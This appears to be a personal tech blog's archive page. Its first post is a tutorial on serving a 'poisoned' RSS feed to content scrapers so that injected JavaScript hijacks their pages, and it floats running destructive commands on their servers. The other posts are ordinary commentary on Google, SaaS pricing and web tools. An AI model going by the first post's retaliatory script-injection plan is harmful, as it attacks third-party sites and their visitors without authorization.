Category Archives: Tools

Poisoned RSS: An approach to dealing with aggressive feed thieves

Poison by ?C?vin ?Ever since the first RSS feeds were published there have been the issue of nasty, spammy people sucking up those RSS feeds and reposting the content on their own nasty, spammy blogs (splogs). The are many approaches to dealing with the the problem – friendly (emailing to ask them to take things down and desist), legal (eg DMCA, but only works for US based sites), technical (eg blocking based on black lists but that is a pain) and editorial (eg short-form RSS, which sucks).

One way not to deal with the problem is to remove your RSS feeds altogether – which, it is rumored, local blog network Gothamist (home of SFist) is considering doing in order to concentrate on the distribution of their proprietary content apps instead. I’m confident that is an extremely flawed strategy, but I digress.

My girlfriend Violet Blue runs a highly successful blog, (warning: content very NSFW), which suffers immensely from splogs republishing her content without permission. As I look after her server and the technical operations for her empire of sites, I decided to see if I could help solve this problem in a different way.

What I am about to go through is a tutorial on how you can really try to hurt someone who is leaching your RSS feed – to the extent that it damages and potentially destroys their splog operation. I am not a lawyer but I do not believe any of what I am about to go through is illegal – although I’ll admit that it is naughty.

In a nutshell…

…what we are going to do is intercept the requests from the target’s server for our RSS feed and divert them to a ‘poisoned’ RSS feed that contains both content warnings but also javascript that when rendered on their website will take over their page, rendering their site and advertising useless for anyone that comes to visit them. If you wanted to go further, you could also use this method to try to execute shell commands on their server, although at this point things become legally murky and ethically questionable.

This tutorial assumes you have some basic site admin skills, can access your logs and can set a .htaccess file.

So here goes…

Step 1: Identify your target

Chances are you’ve discovered someone republishing your content via a Google search or a trackback from the splog to your site. The first thing to do is to get the IP address of the site. Most splogs will request your feed from the same server as they serve their webpages from so this makes it easy to identify them when they come to visit your site to pull down your RSS feed. I’m going to assume that my target has the ip address

Step 2: Search your logs

Search your logs for any access to your site by this ip address. You might want to try:

$ grep "" /var/log/access_log

where is the ip address of the splog and /var/log/access_log is the path + filename of your web server’s access logs.

Hopefully you will have found some matches: - - [16/Jan/2011:14:03:51 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (880701279)" - - [16/Jan/2011:15:57:13 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (1416539927)" - - [16/Jan/2011:20:31:40 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (686799288)" - - [16/Jan/2011:23:52:38 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (2099013304)" - - [17/Jan/2011:02:26:34 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (1475562814)"

It’s worth pointing out this will not work if you directly link your RSS feeds to a 3rd party site like Feedburner, because the request from the splog never reaches your server. At this point sadly there is little you can do, as Google (Feedburner’s parent company) do not give you control to serve different content to arbitrary ip addresses. If you want to use a service like Feedburner, consider offering publicly an RSS url on your server that 302 redirects to Feedburner – achieving the same result while maintaining control of requests.

Step 3: Build the poisoned RSS feed

We are going to create a separate RSS feed that we will redirect the splog’s requests to. If they are creating a new page/blog post for every item in your feed, our new poisoned RSS feed will force their server to generate pages containing what we want to say.

At this point you need to decide how far you want to take things:

  • Display a content warning explaining that they are reproducing your content without permission and you are unhappy about it
  • Display images from TubGirl and other Shock Sites
  • Hijack their page’s DOM and redisplay the page. Anyone accessing their site will only see your content, with all adverts and other links removed.
  • Attempt to run commands on their server – eg attempt to delete files, elevate user permissions, purge the database, etc.

For my situation I decided to go for the first 3.

To create the poisoned RSS feed, you could save out your own current RSS feed and use that as a template. Replace the obvious text in each item with what you would like to say and save it back to your server. Alternatively you could just use my poisoned PHP script on Github.

My script will make their request’s IP address and other HTTP details appear at the footer of each page along with a tracking string so you can search in Google for any other places the are publishing too. It will also try to inject JavaScript that will manipulate the DOM so that when they or anyone else visits their site only your message will appear. Finally, the script outputs 10 identical items, each with a random GUID so that more pages are created each time the splog revisits as it will think each item is new each time.

As a bonus you can also set it to email you when someone access the poisoned feed.

Step 4: Intercept the splog request

The simplest way to divert requests for your RSS feed by the splog, and divert them to the poisoned RSS feed is to put the following into the top of your .htaccess file:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REMOTE_ADDR} ^123\.123\.123\.123$
RewriteRule ^(.*)$

Again, where is the splog’s ip address.

Step 5: Sit back and wait

You can now sit back and wait until the splog requests your content again, at which point it will be directed to your poisoned feed. The splog will go on to ingest the poisoned content in it.

What will happen is that the splog will take each of the items in the feed and convert them to individual pages. Your poisoned content will get ingested into their pages, where if they are not running a correct level of character escapes, Javascript and other code will get executed when the end-user visits the page.

My GMail password scares me with its power!

Google’s GMail blog has some “handy” advice on how pick a good password to project your email account.

Don’t use dictionary words, use mixed case, your eldest kid’s name is a bad choice, etc etc. Yeah that’s great.

But the much bigger security issue I fear is that my GMail username & password is also the same username & password for:

  • My calendar (Google Calendar)
  • My confidential documents (Google Docs)
  • My credit card (Google Checkout)
  • My website’s analytics (Google Analytics)
  • My RSS feed admin (Feedburner)
  • My phone number, voicemail, IM’s (Google Voice + GTalk)
  • Some experimental projects (App Engine)
  • My photos and videos (Picassa and YouTube)
  • + more (see your list of Google services you use)

Given the legitimate places you need to put your username and password in order to access your email (ie your email client, which might be sending it in the clear each time it fetches mail), is it too much to rely on it’s security and integrity for all these other ancillary Google Services?

I am a strong believer that you shouldn’t give your Google username and password to ANYONE for this reason. It pains me to have to give it to RIM but it’s the only way they can push email to my Blackberry.

Security through segregation

It’s really about time Google separated GMail, and perhaps GTalk, authentication from the rest of their properties. At the very least I’d like to see the ability to create a separate password for IMAP/POP access that I can enter into my email client and give to RIM that doesn’t give access to the rest of my Google Account.

However, as Google becomes an ever more vital and relied-upon part of our online workflow (see how many services I use, above), I wonder whether there would be value in offering an optional RSA-style keyfob to help protect access – perhaps for a $20-$50/year fee. I know I would pay, and that PayPal have been offering a product like this for some time at $5 a fob.

WOW it’s expensive to use Freshbooks and Harvest at scale

I don’t subscribe to the “everything muse be free” meme that basically ignores the intrinsic value a product or service gives you. If a product or service provides me with a real value then I am happy to pay for it – either through purchase/subscription or from being monetized via ads/usage data etc.

But I’m surprised at just how expensive some of the darlings of the Web2.0 SaaS era work out to be when used at scale.

Like a crack dealer, giving you the first hit free, most of them offer a “free” plan that is clearly designed to be severely limited the moment things begin to work out for you and your business takes off. There’s nothing new with this way of doing business, but have you seen just how much your hits costs once you get addicted?

Two examples that are particularly of mind are Freshbooks and Harvest. Both are great products; built by great people I have had the honor of meeting over the years.

Time tracking service Harvest starts out at $12/month ($144/year) for a single user but at Swordfish Corp there are now three of us, requiring the 5 user plan @ $40/month ($480/year). Not much change short of $500 seems pretty expensive for a year of time tracking.

Invoicing service Freshbooks has a free and slightly limited option for individuals but a company of three would need to use the 3-staff plan @ $39/month ($468/year) but I notice that once we take on a fourth person we would need to skip to the 10-staff plan @ a jaw-dropping $89/month ($1068/year).

When researching these plans, I’m also considering what my future business needs are. With services like these, I want to pick providers who can scale with me as my business (hopefully) grows.

I should point out that one way of getting around this is to share accounts, but for time tracking this doesn’t work and for invoicing, everyone at Swordfish does their own invoicing on their client accounts.

Now, I’m not against paying for these kinds of services in general. Between myself (personally) and Swordfish, I have paid subscriptions to NolaPro (Hosted accounts package), Shoeboxed (receipt and business card data entry) and Flickr.

And I’m not saying that it’s not worth $480 a year to the company for good time tracking. I’m just saying I’m not sure a service like Harvest is offering me $480 of value a year over and above using a simple Google Spreadsheet created in 20 minutes, for free, and shared within the company.

I’m a fan of the Freemium model, but if it’s going to work the numbers can’t exponentially increase as your usage increases – it’s not fair (a form of bait-&-switch from the free accounts) and it’s also not reflective of the true cost of SasS where the cost should exponentially flatten out at scale.

Join ‘Team Seesmic-Twhirl’ beta tester group and get exclusive preview access

Twhirl logo

Last week we launched a totally new version of the Seesmic website – with a much improved interface on the front end that builds upon 2008’s rewrite of the back-end. The new has version got some great reviews and I know the whole team is very pleased with the positive feedback it’s received. Do check it out if you haven’t tried Seesmic recently.

This week our concentration has moved to Twhirl, our Twitter (+ Seesmic, FriendFeed and Identi.Ca) client we produce. Once again there’s lots of buzz around some exciting new features in the forthcoming version, including:

  • The gathering under the “replies tab” of all tweets that include @yourusername, not just when it’s added at the start of a tweet
  • integration that posts your status messages from Twhirl to Facebook, MySpace, LinkedIn, WordPress and a other sites
  • One-click recording of new and reply Seesmic videos straight from Twhirl
  • Saved search, to keep across the discussion of your favorite terms across the twittersphere
  • More url shortening providers, including and more

I’ve been using the beta version of Twhirl for a few days now and I have to say it’s excellent. We’ll be releasing the new version of Twhirl soon, but in the meantime you can get immediate access to the preview version by joining our brand new beta test group called “Team Seesmic-Twhirl”.

You can find out more, including where to sign up, on Loic’s blog.

Apture: elegantly adding context to your site

“Wow, that’s really really slick!”

That was my reaction when Tristan first showed me a demo of Apture (which just opened for signups, if you want to add it to your blog or website).

We’d met a few times previously and he’d been teasing with hints about the product he was working on – but refused to show me anything, or even give me any detail about what he and his fellow co-founders were really up to.

All I knew was that we shared a common interest in both grassroots and mainstream media, and importance of innovation given the nature of the content often being communicated. We’d spent several meetings discussing all sorts of interest stuff – from the way the media is often the last resort to keep governments and business in check, the need for informed society, through to the power of building products with a platform-orientated architecture.

Very much a meeting of minds – and so when I finally got to experience Apture, I was delighted that it too was at the intersection of so many of my favorite topics. I’m also proud to say that I am a member of Apture’s advisory board.

Welcome to Apture

For me, Apture is about bringing light-touch context and background to topics within the page you are looking at. In essence, it provides a simple framework to attach background context and ancillary content to subjects mentioned in your page – all without interrupting the flow of your reading and crucially, without leaving the page you looking at. In fact, you have already experienced Apture! (unless you are reading this in a feed reader, in which case check out the page on my blog)

When I saw the first demo of the product, what excited me the most was the implementation – which I think is slick and impressive. The thoughtful UI makes the product simple and intuitive to use, backed up by some pretty tight code that makes the seamless experience possible.

Elegantly handling off-site links and embeddable media

From my days working at the BBC News Website, I’ve seen first hand the importance of providing background information on the subjects discussed in a news story. Not everyone follows the news agenda as deeply as others, and providing a bit of context can really make the difference and ensure the reader is able to engage with the latest developments being written about.

I’d also seen examples of how the BBC had got some of it’s interface and style guidelines wrong – like not using hyperlinks inside body content and completely missing the early emergence of embeddable media (arguably pioneered by YouTube). I have to hold my hands up to these as much as anyone else at the Beeb as I was there at the time these things took off.

On both counts Apture solves these problems in an elegant way.

The concern around marking up body content with hyperlinks is about usability. When the user clicks on them she is taken to a new destination page mid-flow of her reading. Apture solves this concern by providing the essence of the page you want to link to in an easily manipulated floating window that the user can quickly digest and either get back to the copy or potentially elect to click through to a fuller page of content. The point is that the reader makes an informed decision whether to jump to a new page or continue reading. Apture also lets the reader position the window around the content so that they can interact with it later on when they are ready.

Another key part of this is the selection of the media you use to provide that background to your post. Apture helps you there too – by recommending relevant content from across numerous repositories on the internet – including Wikipedia, Flickr and IMDB. Finally, it reformats these pages so that the pertinent information is displayed clearly inside the Apture window that is associated with your subject.

Apture also provides a unique way to embed media, and can even handle certain types of media asset just by it noticing you are linking out to a photograph or a video in your piece.

Open for business

Having been in closed beta for some months, this week Apture was released to the public. Getting Apture on your site is really simple (just a line of javascript or the installation of a WordPress Plugin) and of course it is totally free.

You can also take a tour of the product and see more demos of it in action.

New look for Google Analytics

The rest of us only got a short glimpse of the veritable eye candy that was MeasureMap before it was cruelly snatched away by Google into perpetual closed beta oblivion.

There’s nothing to suggest that the service will ever be open to new users… and this has been further compounded by the release of a new interface for Google Analytics, MeasureMaps’ older (and slightly crustier) brother.

Screenshot of Google Analytics

From what I can, Google Analytics has been slowly bathed in the GUI-goodness of MeasureMaps, with some of it marinating nicely into the more established product. Such evidence confirms my suspicions that MeasureMap’s acquisition was made more for it’s interface fu (along with its fu master, Jeffrey Veen) more than anything else. Clearly the intention has been to improve Google’s main stats offering rather than launch a secondary services (such behavior got Yahoo! into a bit of trouble).

[via MarketingPilgrim]

Amazon S3 cost savings and the future of utility computing services

Amazon have been doing some amazing things in the utility computing sector with S3 (storage) and EC2 (virtual servers).

It’s touted as being an economical platform way to run your start-up/company/website/whatever from as it makes use of the space capacity Amazon owns from it’s e-commerce platform (so, er, what happens over Christmas when that platform is at it’s peak?).

I think it very much depends on what you intend to use EC2 and S3 for, but photo sharing site Smugmug has been a champion of S3 for some time – claiming it’s saving them over $500k in the first year. At this point in time they only use Amazon S3 for storage of the images

Michael Arrington called them on their numbers during Web2.0 Summit, and so the Smugmuggers have come back with some real numbers on their blog. The conclusions are:

  • Total amount NOT spent over the last 7 months: $423,686 [by not buying IDE disks, RAID controllers and single CPU servers for their SAN]
  • Total amount spent on S3: $84,255.25
  • Total savings: $339,430.75
  • That works out to $48,490 / month, which is $581,881 per year. Remember, though, our rate of growth is high, so over the remaining 5 months, the monthly savings will be even greater.

I was talking to an interesting start-up on Friday who were offering a product that could essentially be leveraged as a ‘commodity’/’utility’ computing product. I can’t really say what their vertical is but they were marketing it (some-what understandably) with a specific implementation so that it could be leveraged as a turn-key product. Their business plan was based on the percentage their product had on revenue.

I felt that by wrapping an interesting utility product into a single means of implementation they were shutting many doors to ways their product could be used in other areas. My overarching point to them was that what Amazon was really trailblazing here is the pricing model – and rather than charging based on the somewhat fuzzy impact it had on revenue (which could easily have been 0 or negative, not just positive – and potentially off putting IMHO as it requires companies who might be private to disclose revenues, etc) they could charge based on usage. $0.10 for 1000 calls to their service, etc.

EC2, Amazon’s flexible virtual server product, in many ways is even more fascinating. I’m not convinced it’s the cheapest way to run a server continually – not over a 12 month term at least. And its performance over the Christmas period is a bit of an unknown. But the ability to suddenly double or triple the number of instances of an application server, especially for a short time during a serving peak has a real definite value. The emergence of ways to automate the ramping-up and ramping-down of service over the course of a day/week/month cycle are particularly exciting.

It’s definitely an interesting area and I’m curious to see how the industry adopts it.

Your own utility computing service?

My final point on all this, I guess, is look to see whether you have a potential utility computing product in your inventory or as part of your start-up. Even if it’s not your company’s core product it might be something that’s part of your platform. Amazon is still a book and CD retailer after all, and it’s just utilizing affordences in their serving platform.

Anyway the point is not only that you can offer something, but that you can easily monetize it in perhaps the most scalable and lowest risk way – pay as you use. So start thinking whether you have something like gateways (eg api< ->SMS), data processing (sorting, ranking, etc) or database capacity.

Boring update to GTalk ships

Google have launched an upgrade to GTalk – offering pretty bog-standard ancillary IM features:

  • File-sharing
  • Voicemail
  • Music status


I like using GTalk because it’s the only mainstream IM gateway based on the open-source and interoperable Jabber/XMPP format.  It’s the ying to the yang of my use of Skype (which is proprietary and closed).

Sure, that’s a bit of a geeky reason to use it, but I think the lack of interoperability between IM providers is laughable when all of the big names that run them are generally trying to be (/appear to be) ‘open’ everywhere else.

Supporting Google for choosing an open format when they created their own system is important to me.

However these GTalk extensions are presumably extensions outside the Jabber/XMPP standard (hmm maybe not file transfer – will investigate).  The existing ‘voice’ services are, as the Jabber/XMPP standard doesn’t support VoIP.

The point is, I would have liked to have seen Google help to create extensions to the Jabber/XMPP standard to support these new functions, rather than laying proprietary functionality over the otherwise open spec.

I use Gaim for Windows (and Gaim on Linux on my Ubuntu box) which supports Jabber/XMPP but obviously not these proprietary Google extensions – and as such this functionality will probably not be present anyway.

UPDATE: It’s not clear whether either the VoIP functionality or these new functions in today’s release are part of a future Jabber/XMPP spec. I’m going to investigate and report back to set the record straight. 🙂

Great free PDF creation tool for Windows

I just wanted to write a quick post to recommend a free (+ and open source-ish) PDF creation tool I have discovered called PDFCreator.

In the past I’ve used the free services of PDFOnline, which emails you PDF’s of files you upload to it’s server.

However PDFCreator offers you the same functionality by simply creating a virtual printer on your computer that saves out to PDF format.

I know a lot of people are already using tools like this, and that they are freely available (/pre-installed?) on Macs.  So sorry for being slow.

The app is described as ‘open-source’ in that the source code is available for download.  However the PDF file format isn’t open-source, however.

PDFCreator doesn’t include a watermark or similar imprint on the outputted PDF files either.